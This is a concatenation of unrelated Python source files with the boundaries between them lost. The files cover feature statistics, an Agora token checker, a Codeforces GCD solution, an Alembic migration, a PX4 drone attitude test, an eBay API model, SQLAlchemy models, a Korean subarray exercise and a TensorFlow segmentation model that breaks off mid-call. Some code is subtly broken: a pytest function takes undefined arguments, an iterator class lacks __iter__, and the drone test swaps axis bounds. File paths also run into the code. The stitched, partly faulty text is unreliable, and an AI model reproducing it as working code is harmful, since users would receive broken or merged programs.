'mlengine.fiksvm.find_min_max.py' def process(options, feat_dir): resultfile = os.path.join(feat_dir, 'minmax.txt') if checkToSkip(resultfile, options.overwrite): sys.exit(0) nr_of_images, feat_dim = map(int, open(os.path.join(feat_dir,'shape.txt')).readline().split()) min_vals = [1e6] * feat_dim max_vals = [-1e6] * feat_dim offset = np.float32(1).nbytes * feat_dim res = array.array('f') feat_file = os.path.join(feat_dir, 'feature.bin') id_file = os.path.join(feat_dir, 'id.txt') nr_of_images = len(open(id_file).readline().strip().split()) printStatus(INFO, 'parsing %s' % feat_file) fr = open(feat_file, 'rb') s_time = time.time() for i in xrange(nr_of_images): res.fromfile(fr, feat_dim) vec = res for d in xrange(feat_dim): if vec[d] > max_vals[d]: max_vals[d] = vec[d] if vec[d] < min_vals[d]: min_vals[d] = vec[d] del res[:] fr.close() timecost = time.time() - s_time printStatus(INFO, "%g seconds to find min [%g,%g] and max [%g,%g]" % (timecost, min(min_vals), max(min_vals), min(max_vals), max(max_vals))) with open(resultfile, 'w') as f: f.write('%s\n' % ' '.join(map(str, min_vals))) f.write('%s\n' % ' '.join(map(str, max_vals))) f.close() def main(argv=None): if argv is None: argv = sys.argv[1:] parser = OptionParser(usage="""usage: %prog [options] feat_dir""") parser.add_option("--overwrite", default=0, type="int", help="overwrite existing file (default=0)") (options, args) = parser.parse_args(argv) if len(args) < 1: parser.print_help() return 1 return process(options, args[0]) if __name__ == "__main__": sys.exit(main()) 0 # example of overloading __iter__ and __next__ - multy iteration class SkipObject: """Return nefw iterator every time for each __iter__() call """ def __init__(self, wrapped): self.wrapped = wrapped def __iter__(self): return SkipIterator(self.wrapped) class SkipIterator: """Multiply iteration """ def __init__(self, wrapped): self.wrapped = wrapped self.offset = 0 # iterators counter def __next__(self): if self.offset >= len(self.wrapped): # stop iteration raise StopIteration else: item = self.wrapped[self.offset] # iteration self.offset += 2 return item if __name__ == '__main__': text = 'abcde' skipper = SkipObject(text) I = iter(skipper) # indexes print(next(I), next(I), next(I)) for x in skipper: for y in skipper: print((x + y)*2, end=' ') # -*- coding: utf-8 -*- __author__ = "" import hmac import json import time from zlib import crc32 from utils import packer from hashlib import sha256 from collections import OrderedDict from agoratoken import token_v6 def check_key_v6(key, **kwargs): parsed, signature, app_id, cname_crc, uid_crc, ts, salt, privilege = token_v6.AgoraTokenV6.analyze(key) if not parsed: print('[Check] Failed to analyze token') return print('[Check] AccessToken(V6), Signature: {}, AppId: {}, CRC(ChannelName): {}, CRC(Uid): {}, Ts: {}, ' 'Salt: {}, privilege: {}'.format(signature, app_id, cname_crc, uid_crc, ts, salt, ','.join(['{}:{}'.format(x, y) for x, y in privilege.items()]))) now_ts = int(time.time()) if ts < now_ts: print('[Check] Error: token expired, now ts: {}, expired at {}'.format(now_ts, ts)) for p, t in privilege.items(): if t < now_ts: print('[Check] Error: token privilege expired, privilege: {}, now ts: {}, expired at {}'.format(p, now_ts, t)) with open('configs/project.json') as f: project = json.load(f) config_app_id = project.get('appID', '') config_app_cert = project.get('appCert', '') if config_app_id != app_id: print('[Check] Error: appID not same, stop checker') return params = dict(kwargs) channel = params.get('channel', '') user 
= params.get('user', '') if not channel and not user: print('[Check] Warn: cname, uid and signature not checked') return if cname_crc != crc32(channel.encode('utf-8')) & 0xffffffff: print('[Check] Error: channel name crc32 not same') if uid_crc != crc32(user.encode('utf-8')) & 0xffffffff: print('[Check] Error: user id crc32 not same') val = app_id.encode('utf-8') + channel.encode('utf-8') + user.encode('utf-8') + packer.pack_uint32(salt) + \ packer.pack_uint32(ts) + packer.pack_map_uint32(OrderedDict(sorted(iter(privilege.items()), key=lambda x: int(x[0])))) if signature != hmac.new(config_app_cert.encode('utf-8'), val, sha256).digest().hex(): print('[Check] Error: signature not same') codeforces/664A_gcd.py #!/usr/bin/env python3 # 664A_gcd.py - Codeforces.com/problemset/problem/664/A by import unittest import sys ############################################################################### # Gcd Class (Main Program) ############################################################################### class Gcd: """ Gcd representation """ def __init__(self, test_inputs=None): """ Default constructor """ it = iter(test_inputs.split("\n")) if test_inputs else None def uinput(): return next(it) if it else sys.stdin.readline().rstrip() # Reading single elements [self.a, self.b] = map(int, uinput().split()) def calculate(self): """ Main calcualtion function of the class """ result = 1 if self.a != self.b else self.a return str(result) ############################################################################### # Unit Tests ############################################################################### class unitTests(unittest.TestCase): def test_single_test(self): """ Gcd class testing """ # Constructor test test = "1 2" d = Gcd(test) self.assertEqual(d.a, 1) # Sample test self.assertEqual(Gcd(test).calculate(), "1") # Sample test test = "61803398874989484820458683436563811772030917980576 61803398874989484820458683436563811772030917980576" self.assertEqual(Gcd(test).calculate(), "61803398874989484820458683436563811772030917980576") # Sample test test = "" # self.assertEqual(Gcd(test).calculate(), "0") # My tests test = "" # self.assertEqual(Gcd(test).calculate(), "0") # Time limit test # self.time_limit_test(5000) def time_limit_test(self, nmax): """ Timelimit testing """ import random import timeit # Random inputs test = str(nmax) + " " + str(nmax) + "\n" numnums = [str(i) + " " + str(i+1) for i in range(nmax)] test += "\n".join(numnums) + "\n" nums = [random.randint(1, 10000) for i in range(nmax)] test += " ".join(map(str, nums)) + "\n" # Run the test start = timeit.default_timer() d = Gcd(test) calc = timeit.default_timer() d.calculate() stop = timeit.default_timer() print("\nTimelimit Test: " + "{0:.3f}s (init {1:.3f}s calc {2:.3f}s)". 
format(stop-start, calc-start, stop-calc)) if __name__ == "__main__": # Avoiding recursion limitaions sys.setrecursionlimit(100000) if sys.argv[-1] == "-ut": unittest.main(argv=[" "]) # Print the result string sys.stdout.write(Gcd().calculate()) bollwyvl/nb-livereloadsetup.py1-10 #!/usr/bin/env python # -*- coding: utf-8 -*- from setuptools import setup from os.path import join # should be loaded below __version__ = None with open(join("src", "nblivereload", "_version.py")) as version: exec(version.read()) with open('./README.rst') as readme: README = readme.read() setup( name="nblivereload", version=__version__, description="Autoreload static files in the Jupyter Notebook", long_description=README, author="", author_email="", license="BSD-3-Clause", url="https://github.com/bollwyvl/nb-livereload", keywords="ipython jupyter livereload", classifiers=[ "Development Status :: 4 - Beta", "Framework :: IPython", "Programming Language :: Python", "License :: OSI Approved :: BSD License" ], package_dir={"": "src"}, packages=["nblivereload"], setup_requires=["notebook", "livereload"], tests_require=["pytest", "requests"], include_package_data=True ) 0 class GameConfig: def __init__(self): self.dimension = 2 self.El = 2 self.Eu = 3 self.Fl = 3 self.Fu = 3 class SpawnConfig: @staticmethod def Block(other=None): return SpawnConfig({(1, 1), (1, 2), (2, 1), (2, 2)}, other) @staticmethod def Blinker(other=None): return SpawnConfig({(5, 2), (5, 1), (5, 3)}, other) @staticmethod def Tub(other=None): return SpawnConfig({(9, 2), (10, 1), (10, 3), (11, 2)}, other) @staticmethod def All(): return SpawnConfig.Block(SpawnConfig.Tub(SpawnConfig.Blinker())) def __init__(self, initSet=None, other=None): self.initSet = initSet if other is not None: self.initSet.update(other.initSet) self.initSpawnRate = 0.3 self.initSpawnDistance = 5 self.initTotal = 300#0.5 * pow(self.initSpawnDistance, 2) # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. """Arguments for the model. """ import os import sys from pathlib import Path # pylint:disable=line-too-long class Args: """Arguments for the model.""" training_data_dir: str = None bert_model: str = None task_name: str = None model_dir: str = None cleanup_output_dir: bool = False cache_dir: str = "" max_seq_length: int = 128 do_train: bool = None do_eval: bool = None do_lower_case: bool = None train_batch_size: int = 4 eval_batch_size: int = 8 learning_rate: float = 5e-5 num_train_epochs: float = 3.0 warmup_proportion: float = 0.1 no_cuda: bool = None local_rank: int = -1 seed: int = 42 gradient_accumulation_steps: int = 1 fp16: bool = None loss_scale: float = 0 @classmethod def for_flight_booking( cls, training_data_dir: str = os.path.abspath( os.path.join(os.path.dirname(os.path.abspath(__file__)), "../training_data") ), task_name: str = "flight_booking", ): """Return the flight booking args.""" args = cls() args.training_data_dir = training_data_dir args.task_name = task_name home_dir = str(Path.home()) args.model_dir = os.path.abspath(os.path.join(home_dir, "models/bert")) args.bert_model = "bert-base-uncased" args.do_lower_case = True print( f"Bert Model training_data_dir is set to {args.training_data_dir}", file=sys.stderr, ) print(f"Bert Model model_dir is set to {args.model_dir}", file=sys.stderr) return args """events Revision ID: 9c92c85163a9 Revises: Create Date: 2016-05-09 19:04:44.498817 """ from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import postgresql # revision identifiers, used by Alembic. 
revision = '9c92c85163a9' down_revision = '6' def upgrade(): op.create_table('event', sa.Column('id', sa.BigInteger(), nullable=False), sa.Column('origin', sa.Unicode(), nullable=True), sa.Column('data', postgresql.JSONB(), nullable=True), sa.Column('created_at', postgresql.TIMESTAMP(), autoincrement=False, nullable=True), sa.PrimaryKeyConstraint('id') ) op.drop_table('processing_log') def downgrade(): op.create_table('processing_log', sa.Column('created_at', postgresql.TIMESTAMP(), autoincrement=False, nullable=True), sa.Column('updated_at', postgresql.TIMESTAMP(), autoincrement=False, nullable=True), sa.Column('id', sa.BIGINT(), nullable=False), sa.Column('operation', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('component', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('source_location', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('content_hash', sa.VARCHAR(length=65), autoincrement=False, nullable=True), sa.Column('foreign_id', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('source_id', sa.INTEGER(), autoincrement=False, nullable=True), sa.Column('document_id', sa.BIGINT(), autoincrement=False, nullable=True), sa.Column('meta', postgresql.JSONB(), autoincrement=False, nullable=True), sa.Column('error_type', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('error_message', sa.VARCHAR(), autoincrement=False, nullable=True), sa.Column('error_details', sa.VARCHAR(), autoincrement=False, nullable=True), sa.PrimaryKeyConstraint('id', name=u'processing_log_pkey') ) op.drop_table('event') from abc import abstractmethod from pandas.core.frame import DataFrame from sqlalchemy import Table from sqlalchemy.engine.base import Engine from .gen import AbstractExecutionGenerator, FullMerge from .util import derive_staging, recreate_table import logging class AbstractDbLoader: @abstractmethod def __call__(self, df: DataFrame, table: Table, engine: Engine): pass class PandasDbLoader(AbstractDbLoader): def __init__(self, **kwargs): self.load_kwargs = {"index": False, "chunksize": 20000, "if_exists": "append"} self.load_kwargs.update(kwargs) def __call__(self, df: DataFrame, table: Table, engine: Engine): df.to_sql(table.name, engine, schema=table.schema, **self.load_kwargs) class PandasLoad: def __init__(self, engine): self.engine = engine def load_db( self, target: Table, dataframe: DataFrame, execution_generator: AbstractExecutionGenerator = FullMerge, db_loader: AbstractDbLoader = PandasDbLoader(), ): source = derive_staging(target, list(dataframe.columns)) recreate_table(source, self.engine) db_loader(dataframe, source, self.engine) with self.engine.begin() as conn: for stmt in execution_generator(source, target): logging.info(f"Executing: {stmt}") conn.execute(stmt) #!/usr/bin/env python2 #*************************************************************************** # # Copyright (c) 2015 PX4 Development Team. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # 3. 
Neither the name PX4 nor the names of its contributors may be # used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # #***************************************************************************/ # # @author <> # # The shebang of this file is currently Python2 because some # dependencies such as pymavlink don't play well with Python3 yet. from __future__ import division PKG = 'px4' import rospy from geometry_msgs.msg import Quaternion, Vector3 from mavros_msgs.msg import AttitudeTarget from mavros_test_common import MavrosTestCommon from pymavlink import mavutil from std_msgs.msg import Header from threading import Thread from tf.transformations import quaternion_from_euler class MavrosOffboardAttctlTest(MavrosTestCommon): """ Tests flying in offboard control by sending attitude and thrust setpoints via MAVROS. For the test to be successful it needs to cross a certain boundary in time. """ def setUp(self): super(MavrosOffboardAttctlTest, self).setUp() self.att = AttitudeTarget() self.att_setpoint_pub = rospy.Publisher( 'mavros/setpoint_raw/attitude', AttitudeTarget, queue_size=1) # send setpoints in seperate thread to better prevent failsafe self.att_thread = Thread(target=self.send_att, args=()) self.att_thread.daemon = True self.att_thread.start() def tearDown(self): super(MavrosOffboardAttctlTest, self).tearDown() # # Helper methods # def send_att(self): rate = rospy.Rate(10) # Hz self.att.body_rate = Vector3() self.att.header = Header() self.att.header.frame_id = "base_footprint" self.att.orientation = Quaternion(*quaternion_from_euler(0.25, 0.25, 0)) self.att.thrust = 0.7 self.att.type_mask = 7 # ignore body rate while not rospy.is_shutdown(): self.att.header.stamp = rospy.Time.now() self.att_setpoint_pub.publish(self.att) try: # prevent garbage in console output when thread is killed rate.sleep() except rospy.ROSInterruptException: pass # # Test method # def test_attctl(self): """Test offboard attitude control""" # boundary to cross boundary_x = 5 boundary_y = 5 boundary_z = -5 # make sure the simulation is ready to start the mission self.wait_for_topics(60) self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND, 10, -1) self.log_topic_vars() self.set_mode("OFFBOARD", 5) self.set_arm(True, 5) rospy.loginfo("run mission") rospy.loginfo("attempting to cross boundary | x: {0}, y: {1}, z: {2}". format(boundary_x, boundary_y, boundary_z)) # does it cross expected boundaries in 'timeout' seconds? 
timeout = 12 # (int) seconds loop_freq = 2 # Hz rate = rospy.Rate(loop_freq) crossed = False for i in xrange(timeout * loop_freq): if (self.local_position.pose.position.x > boundary_x and self.local_position.pose.position.z > boundary_y and self.local_position.pose.position.y < boundary_z): rospy.loginfo("boundary crossed | seconds: {0} of {1}".format( i / loop_freq, timeout)) crossed = True break try: rate.sleep() except rospy.ROSException as e: self.fail(e) self.assertTrue(crossed, ( "took too long to cross boundaries | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} | timeout(seconds): {3}". format(self.local_position.pose.position.x, self.local_position.pose.position.y, self.local_position.pose.position.z, timeout))) self.set_arm(False, 5) if __name__ == '__main__': import rostest rospy.init_node('test_node', anonymous=True) rostest.rosrun(PKG, 'mavros_offboard_attctl_test', MavrosOffboardAttctlTest) gbm001/ebay_rest # coding: utf-8 """ Recommendation API The Recommendation API returns information that sellers can use to optimize the configuration of their listings on eBay.

Currently, the API contains a single method, findListingRecommendations. This method provides information that sellers can use to configure Promoted Listings ad campaigns to maximize the visibility of their items in the eBay marketplace. # noqa: E501 OpenAPI spec version: 1.1.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class BidPercentages(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'basis': 'str', 'value': 'str' } attribute_map = { 'basis': 'basis', 'value': 'value' } def __init__(self, basis=None, value=None): # noqa: E501 """BidPercentages - a model defined in Swagger""" # noqa: E501 self._basis = None self._value = None self.discriminator = None if basis is not None: self.basis = basis if value is not None: self.value = value @property def basis(self): """Gets the basis of this BidPercentages. # noqa: E501 The basis by which the ad rate is calculated. Valid Values: ITEM and TRENDING For implementation help, refer to eBay API documentation # noqa: E501 :return: The basis of this BidPercentages. # noqa: E501 :rtype: str """ return self._basis @basis.setter def basis(self, basis): """Sets the basis of this BidPercentages. The basis by which the ad rate is calculated. Valid Values: ITEM and TRENDING For implementation help, refer to eBay API documentation # noqa: E501 :param basis: The basis of this BidPercentages. # noqa: E501 :type: str """ self._basis = basis @property def value(self): """Gets the value of this BidPercentages. # noqa: E501 The bid percentage data is a single precision value, as calculated by the associated basis. In Promoted listings ad campaigns, the bid percentage (also known as the ad rate) is a user-defined value that sets the level that eBay raises the visibility of the listing in the marketplace. It is also the rate that is used to calculate the Promoted Listings fee. Minimum value: 1.0   Maximum value: 100.0 # noqa: E501 :return: The value of this BidPercentages. # noqa: E501 :rtype: str """ return self._value @value.setter def value(self, value): """Sets the value of this BidPercentages. The bid percentage data is a single precision value, as calculated by the associated basis. In Promoted listings ad campaigns, the bid percentage (also known as the ad rate) is a user-defined value that sets the level that eBay raises the visibility of the listing in the marketplace. It is also the rate that is used to calculate the Promoted Listings fee. Minimum value: 1.0   Maximum value: 100.0 # noqa: E501 :param value: The value of this BidPercentages. 
# noqa: E501 :type: str """ self._value = value def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(BidPercentages, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, BidPercentages): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other """SQLAlchemy models for the application """ import sqlalchemy.ext.declarative from sqlalchemy import Column, Integer, DateTime, String, func class IntEnum(sqlalchemy.types.TypeDecorator): """Add an integer enum class""" impl = sqlalchemy.Integer def __init__(self, enumtype, *args, **kwargs): super().__init__(*args, **kwargs) self._enumtype = enumtype def process_bind_param(self, value, dialect): return value.value def process_result_value(self, value, dialect): return self._enumtype(value) class ReprBase(object): """Extend the base class Provides a nicer representation when a class instance is printed. Found on the SA wiki """ def __repr__(self): return "%s(%s)" % ( (self.__class__.__name__), ", ".join( [ "%s=%r" % (key, getattr(self, key)) for key in sorted(self.__dict__.keys()) if not key.startswith("_") ] ), ) # base class for SQLAlchemy declarative models. Inherits ReprBase to get nicer __repr__ behaviour DeclarativeBase = sqlalchemy.ext.declarative.declarative_base(cls=ReprBase) class RegisteringFraObjekt(DeclarativeBase): # SQLALchemy knows abstract classes do not map to a table. # If class is not declared abstract then SQLAlchemy whines about missing table declaration. __abstract__ = True objectid = Column(Integer, primary_key=True) _registreringfra = Column( "registreringfra", DateTime(timezone=True), nullable=False, default=func.sysdate(), ) @property def registreringfra(self): return self._registreringfra class RegisteringTidObjekt(DeclarativeBase): # SQLALchemy knows abstract classes do not map to a table. # If class is not declared abstract then SQLAlchemy whines about missing table declaration. __abstract__ = True objectid = Column(Integer, primary_key=True) _registreringfra = Column( "registreringfra", DateTime(timezone=True), nullable=False, default=func.sysdate(), ) _registreringtil = Column("registreringtil", DateTime(timezone=True)) @property def registreringfra(self): return self._registreringfra @property def registreringtil(self): return self._registreringtil class Konfiguration(DeclarativeBase): """ Konfigurationstabel for FIRE. Tabellen har det særpræg at der kun kan indlæses en række i den. Den indeholder derfor altid den nye udgave af opsætningen. Tabellen er skabt for at kunne holde styr på systemspecifikke detaljer, der kan ændre sig over tid, fx basestier på et filsystem. 
""" __tablename__ = "konfiguration" objectid = Column(Integer, primary_key=True) dir_skitser = Column(String, nullable=False) dir_materiale = Column(String, nullable=False) # Expose these types from .geometry import * from .punkttyper import * from .sagstyper import * tensorqtl/__init__.py __version__ = "0.1.0" from .tensorqtl import * from naive_bayes_model import * if __name__ == "__main__": Xtrain, Ytrain = fetch_data("./Data/training_data.csv", "./Data/training_labels.csv") Xtest, Ytest = fetch_data("./Data/testing_data.csv", "./Data/testing_labels.csv") model = Naive_Bayes_Model() model.train(Xtrain, Ytrain) model.test(Xtest, Ytest) save_model("./Results/twitter_sentiment_naive_bayes.model", model) #! /usr/bin/python # # This code is based on dynamic_action.py of the actionlib package, written by # . # Adapted to work for services by at Synapticon GmbH. # # ********************************************************** # Software License Agreement (BSD License) # # Copyright (c) 2009, , Inc. # Copyright (c) 2018, Synapticon GmbH # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of , Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # ********************************************************** """Helper class to load service message types.""" import roslib import rospy import sys class DynamicService(object): """Provides types of the given service message.""" def __init__(self, name): """Initialize. Args: name (str): Name of the service type (e.g. "std_srvs/SetBool"). """ self.name = name self.base = self.load_submsg('') self.request = self.load_submsg('Request') self.response = self.load_submsg('Response') def load_submsg(self, subname): """Load submessage. Args: subname (str): Suffix that is added to the type. Returns: The sub-message type. """ msgclass = roslib.message.get_service_class(self.name + subname) if msgclass is None: rospy.logfatal('Could not load message for: %s' % (self.name + subname)) sys.exit(1) return msgclass ''' 연속 부분 최대합 n개의 숫자가 주어질 때, 연속 부분을 선택하여 그 합을 최대화 하는 프로그램을 작성하시오. 예를 들어, 다음과 같이 8개의 숫자가 있다고 하자. 1 2 -4 5 3 -2 9 -10 이 때, 연속 부분이란 연속하여 숫자를 선택하는 것을 말한다. 가능한 연속 부분으로써 [1, 2, -4], [5, 3, -2, 9], [9, -10] 등이 있을 수 있다. 
이 연속 부분들 중에서 가장 합이 큰 연속 부분은 [5, 3, -2, 9] 이며, 이보다 더 합을 크게 할 수는 없다. 따라서 연속 부분 최대합은 5+3+(-2)+9 = 15 이다. 실습 입력 첫째 줄에 n개의 숫자가 주어진다. (1 ≤ n ≤ 100,000) 출력 n개의 숫자에 대하여 연속 부분 최대합을 출력한다. 입력 예시 1 2 -4 5 3 -2 9 -10 출력 예시 15 ''' def getSubsum(data) : ''' n개의 숫자가 list로 주어질 때, 그 연속 부분 최대합을 반환하는 함수를 작성하세요. ''' dp = [0] * 100001 dp[0] = data[0] for i in range(len(data)): dp[i] = max(dp[i-1] + data[i], data[i]) return max(dp) print(getSubsum([1, 2, -4, 5, 3, -2, 9, -10]))import datetime as dt import main today = dt.date.today() weekday = today.weekday() def hello_world(): e = dt.datetime.now() print ("Today's date: = %s/%s/%s" % (e.day, e.month, e.year)) print ("The time is now: = %s:%s:%s" % (e.hour, e.minute, e.second)) print("FUCK IT") def days_for_next_friday(): next_friday = today + dt.timedelta( (4- weekday) % 7 ) diff = str(next_friday - today)[0:1] print("Today is: "+str(today) + " and next friday is: "+str(next_friday)+" and there is a difference of "+str(diff)+" days") return diff def days_for_last_friday(): last_friday = today - dt.timedelta(days=weekday) + dt.timedelta(days=4, weeks=0) diff = diff = str(today - last_friday)[0:1] print("Today is: "+str(today) + " and before friday is: "+str(last_friday)+" and there is a difference of "+str(diff)+" days") return diff def time_handler(): if( weekday == 5 or weekday == 6): diff = days_for_last_friday() else: diff = days_for_next_friday() days/10-12-pytest/test_rotate.py import pytest def test_rotate(string, n): """Test the rotate function""" assert rotate('hello', 2) == 'llohe' assert rotate('hello', -2) == 'lohel' 1-10 import tensorflow as tf import tensorflow.contrib.layers as layers from tensorflow.contrib.framework import arg_scope import losses def total_loss_sum(losses): # Assemble all of the losses for the current tower only. # Calculate the total loss for the current tower. 
regularization_losses = tf.contrib.losses.get_regularization_losses() total_loss = tf.add_n(losses + regularization_losses, name='total_loss') return total_loss def loss(logits, labels, num_classes): xent_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, labels) loss = tf.reduce_mean(xent_loss) #loss = losses.multiclass_hinge_loss(logits, labels, num_classes) total_loss = total_loss_sum([loss]) return total_loss def layer(net, num_filters, name, is_training): with tf.variable_scope(name): net = tf.contrib.layers.batch_norm(net, **bn_params) net = tf.nn.relu(net) net = layers.convolution2d(net, num_filters, kernel_size=3) #if is_training: #net = tf.nn.dropout(net, keep_prob=0.8) return net def dense_block(net, size, r, name, is_training): with tf.variable_scope(name): outputs = [] for i in range(size): if i < size - 1: x = net net = layer(net, r, 'layer'+str(i), is_training) outputs += [net] net = tf.concat(3, [x, net]) else: net = layer(net, r, 'layer'+str(i), is_training) outputs += [net] net = tf.concat(3, outputs) return net def downsample(net, name, is_training): with tf.variable_scope(name): net = tf.contrib.layers.batch_norm(net) net = tf.nn.relu(net) num_filters = net.get_shape().as_list()[3] net = layers.convolution2d(net, num_filters, kernel_size=1) #if is_training: # net = tf.nn.dropout(net, keep_prob=0.8) net = layers.max_pool2d(net, 2, stride=2, padding='SAME') return net def upsample(net, name): with tf.variable_scope(name): height, width = net.get_shape().as_list()[1:3] print(height, width) net = tf.image.resize_bilinear(net, [2*height, 2*width]) #num_filters = net.get_shape().as_list()[3] #net = tf.contrib.layers.convolution2d_transpose(net, num_filters, kernel_size=3, stride=2) return net def _build(image, num_classes, is_training): global bn_params bn_params = { # Decay for the moving averages. 'decay': 0.999, 'center': True, 'scale': True, # epsilon to prevent 0s in variance. 
'epsilon': 0.001, # None to force the updates 'updates_collections': None, 'is_training': is_training, } weight_decay = 1e-4 #init_func = layers.variance_scaling_initializer(mode='FAN_OUT') init_func = layers.variance_scaling_initializer() #2: [3,4,5], #block_sizes = [2,3,4] block_sizes = [2,3,4,5] r = 16 with arg_scope([layers.convolution2d, layers.convolution2d_transpose], stride=1, padding='SAME', activation_fn=None, normalizer_fn=None, normalizer_params=None, weights_initializer=init_func, biases_initializer=None, weights_regularizer=layers.l2_regularizer(weight_decay)): block_outputs = [] with tf.variable_scope('classifier'): net = layers.convolution2d(image, 48, 3, scope='conv0') for i, size in enumerate(block_sizes): print(i, size) x = net net = dense_block(net, size, r, 'block'+str(i), is_training) net = tf.concat(3, [x, net]) block_outputs += [net] if i < len(block_sizes) - 1: net = downsample(net, 'block'+str(i)+'_downsample', is_training) print(net) #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' classif1 out = ') #logits_mid = layers.convolution2d(net, FLAGS.num_classes, 1, # biases_initializer=tf.zeros_initializer, scope='logits_middle') #logits_mid = tf.image.resize_bilinear(logits_mid, [FLAGS.img_height, FLAGS.img_width], # name='resize_logits_middle') #net = tf.nn.relu(net) #num_filters = net.get_shape().as_list()[3] #net = layers.convolution2d(net, num_filters, kernel_size=1) for i, size in reversed(list(enumerate(block_sizes[:-1]))): print(i, size) net = upsample(net, 'block'+str(i)+'_back_upsample') print(block_outputs[i]) net = tf.concat(3, [block_outputs[i], net]) print(net) net = dense_block(net, size, r, 'block'+str(i)+'_back', is_training) print(net) #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' out = ') mask = layers.convolution2d(net, 1, 1, biases_initializer=tf.zeros_initializer, scope='mask') #mask = tf.nn.relu(mask) #mask = tf.minimum(tf.nn.relu(mask), 1) mask = tf.sigmoid(mask) #mask = tf.Print(mask, [tf.reduce_sum(mask)], message='mask sum = ') #reg_scale = 1e-5 reg_scale = 1e-6 #reg_scale = 1e-4 # works! 
#reg_scale = 5e-6 #reg_scale = 5e-6 mask_regularizer = layers.l1_regularizer(reg_scale) print(mask_regularizer) #mask_regularizer = layers.l2_regularizer(reg_scale) reg_loss = mask_regularizer(mask) #reg_loss = tf.reduce_mean(mask_regularizer(mask)) #l1_loss = 0 image = tf.mul(image, mask) #tf.get_variable_scope().reuse_variables() with tf.variable_scope('classifier', reuse=True): #with tf.variable_scope('classifier2'): net = layers.convolution2d(image, 48, 3, scope='conv0') for i, size in enumerate(block_sizes): print(i, size) x = net net = dense_block(net, size, r, 'block'+str(i), is_training) net = tf.concat(3, [x, net]) if i < len(block_sizes) - 1: net = downsample(net, 'block'+str(i)+'_downsample', is_training) print(net) #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' classif2 out = ') #logits = layers.convolution2d(net, num_classes, 1, biases_initializer=tf.zeros_initializer, # scope='logits') with tf.contrib.framework.arg_scope([layers.fully_connected], activation_fn=tf.nn.relu, normalizer_fn=layers.batch_norm, normalizer_params=bn_params, 